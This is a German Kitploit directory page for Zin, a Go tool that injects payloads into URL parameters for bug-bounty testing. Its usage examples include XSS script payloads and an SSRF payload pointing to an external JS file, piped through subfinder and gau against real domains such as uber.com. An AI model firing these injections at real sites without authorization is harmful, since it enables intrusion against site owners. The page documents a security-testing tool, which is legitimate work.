Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Zin — Ein Payload-Injektor für Bug-Bounties geschrieben in Go | Kitploit
Tools/GitHubGitHub/ethicalhackingplayground/zin
Webanwendungs-ExploitationInformationsbeschaffungPenetrationstests
GitHubethicalhackingplayground/zin

Zin

Ein Payload-Injektor für Bug-Bounties geschrieben in Go

Repository anzeigen
7026vor 6 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Alternativtext

Version 1.0

😎 Zin 😎

Ein Payload-Injektor für Bug Bounties, geschrieben in Go

Bild von Gyazo

Funktionen

  • Mehrere Payloads in alle Parameter injizieren
  • Einzelne Payloads in alle Parameter injizieren
  • Speichert Antworten im Ausgabeordner
  • Zeigt Statuscode und Antwortlänge an
  • Kann nach Mustern in der Antwort greppen
  • Sehr schnell
  • Einfach einzurichten

Installation

$ go get -u github.com/ethicalhackingplayground/Zin

Neue Funktionen

-✅ Mustererkennung in Antworten

-✅ Statuscodes abgleichen

Argumente

root@kitploit:~
      _
     (_)
  _____ _ __
 |_  / | '_ \
  / /| | | | |
 /___|_|_| |_|


May the bounties come


  -c int
        the concurrency (default 20)
  -g string
        grep the response for any matches
  -p string
        the payload to be used
  -pL string
        the list of payloads to be used
  -s int
        filter by status codes (default 200)
        

SSRF-Beispiel

$ subfinder uber.com | gau | grep "=http" | Zin -c 80 -p http://10.82.214.84:31386/foobar.js -g "SUP3R_S3cret_1337_K3y"

XSS-Beispiel

$ subfinder uber.com | gau| Zin -c 80 -p '"><script>alert(matchforthis)script>' -g "matchforthis"

Mehrere Payloads injizieren

$ cat hosts | gau | grep "&" | Zin -c 80 -pL <payloadfile>

Subdomain-Scan

$ subfinder -dL domains --silent | gau | Zin -c 80 -p <payload>

Nur Parameter testen

$ echo "google.com" | gau | grep "&" | Zin -c 80 -p '"><script>alert(matchthis)</script<"' -g "matchthis"

Mehrere Hosts

$ cat hosts | gau | Zin -c 80 -p <payload>

Wenn du einen Bounty bekommst, unterstütze mich bitte mit einem Kaffee


Kauf mir einen Kaffee
Tool herunterladen